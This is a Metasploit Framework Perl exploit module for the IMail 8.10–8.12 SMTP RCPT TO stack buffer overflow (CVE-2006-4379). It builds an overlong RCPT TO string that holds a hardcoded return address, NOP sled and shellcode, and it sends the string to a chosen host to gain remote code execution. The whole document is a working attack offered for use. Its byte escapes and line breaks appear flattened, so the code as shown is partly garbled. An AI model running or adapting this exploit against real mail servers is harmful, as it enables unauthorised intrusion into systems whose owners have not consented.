Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta)

##  # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::imail_smtp_rcpt_overflow; use base \"Msf::Exploit\"; use strict; use Pex::Text; my $advanced = { }; my $info = { \'Name\'    => \'IMail 2006 and 8.x SMTP Stack Overflow Exploit\', \'Version\'  => \'$Revision: 1.0 $\', \'Authors\' => [ \'Jacopo Cervini <acaro [at] jervus.it>\', ], \'Arch\'    => [ \'x86\' ], \'OS\'      => [ \'win32\', \'winnt\', \'win2000\', \'winxp\', \'win2003\'], \'Priv\'    => 1, \'UserOpts\'  =>   { \'RHOST\' => [1, \'ADDR\', \'The target address\'], \'RPORT\' => [1, \'PORT\', \'The target port\', 25], \'Encoder\'   => [1, \'EncodedPayload\', \'Use Pex!!\'],   }, \'AutoOpts\'  => { \'EXITFUNC\'  => \'seh\' }, \'Payload\' =>   { \'Space\'     => 400, \'BadChars\'  => \"x00x0dx0ax20x3ex22x40\", \'Keys\'      => [\'+ws2ord\'],   }, \'Description\'  => Pex::Text::Freeform(qq{ This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service. If we send a long strings for RCPT TO command contained within the characters \'@\' and \':\' we can overwrite the eip register and exploit the vulnerable smpt service }), \'Refs\'  =>   [ [\'BID\', \'19885\'], [\'CVE\', \'2006-4379\'], [\'URL\',   \'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html\'],   ], \'Targets\' =>   [ [\'Universal IMail 8.10\',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10 [\'Universal IMail 8.12\',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12   ], \'DefaultTarget\' => 0, \'Keys\' => [\'smtp\'], \'DisclosureDate\' => \'September 7 2006\',   }; sub new { my $class = shift; my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar(\'RHOST\'); my $target_port = $self->GetVar(\'RPORT\'); my $target_idx  = $self->GetVar(\'TARGET\'); my $shellcode   = $self->GetVar(\'EncodedPayload\')->Payload; my $target = $self->Targets->[$target_idx]; my $ehlo = \"EHLO \" . \" \"; my $mail_from = \"MAIL FROM:\" . \"x20\" . \"x3c\".\"acaro\". \"x40\".\"jervus.it\" . \"x3e\" . \" \"; my $pattern = \"x20x3cx40\"; $pattern .= pack(\'V\', $target->[1]); $pattern .=\"x3a\" . $self->MakeNops((0x1e8-length ($shellcode))); $pattern .= $shellcode; $pattern .= \"x4ax61x63x3e\";  my $request = \"RCPT TO: \" . $pattern .\" \"; $self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using pop eax, ret at 0x%.8x...\", $target->[1])); my $s = Msf::Socket::Tcp->new   ( \'PeerAddr\'  => $target_host, \'PeerPort\'  => $target_port, \'LocalPort\' => $self->GetVar(\'CPORT\'), \'SSL\'       => $self->GetVar(\'SSL\'),   ); if ($s->IsError) { $self->PrintLine(\'[*] Error creating socket: \' . $s->GetError); return; } my $r = $s->Recv(-1, 5); $s->Send($ehlo); $self->PrintLine(\"[*] I\'m sending ehlo command\"); $self->PrintLine(\"[*] $r\"); sleep(2); $s->Send($mail_from); $self->PrintLine(\"[*] I\'m sending mail from command\"); $r = $s->Recv(-1, 10); $self->PrintLine(\"[*] $r\"); sleep(2); $s->Send($request); $self->PrintLine(\"[*] I\'m sending rcpt to command\"); sleep(2); return; }